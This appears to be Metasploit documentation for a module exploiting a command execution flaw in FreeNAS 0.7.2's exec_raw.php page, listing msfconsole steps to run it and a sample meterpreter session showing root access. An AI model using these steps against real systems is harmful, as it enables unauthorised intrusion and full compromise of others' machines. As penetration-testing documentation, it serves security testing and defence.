## Vulnerable Application

This module exploits an arbitrary command execution flaw
in FreeNAS 0.7.2 < rev.5543. When passing a specially formatted URL
to the exec_raw.php page, an attacker may be able to execute arbitrary commands.

NOTE: This module works best with php/meterpreter payloads.

## Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: ```use exploit/multi/http/freenas_exec_raw```
  4. Do: ```set rhost [ip]```
  5. Do: ```run```
  6. You should get a shell.

## Options

## Scenarios

### Unknown

```
meterpreter > sysinfo
Computer: freenas.local
OS      : FreeBSD freenas.local 7.3-RELEASE-p2 FreeBSD 7.3-RELEASE-p2 #0: Sat Jul 31 12:22:04 CEST 2010     root@dev.freenas.org:/usr/obj/freenas/usr/src/sys/FREENAS-i386 i386
meterpreter > getuid
Server username: root (0)
meterpreter >
```
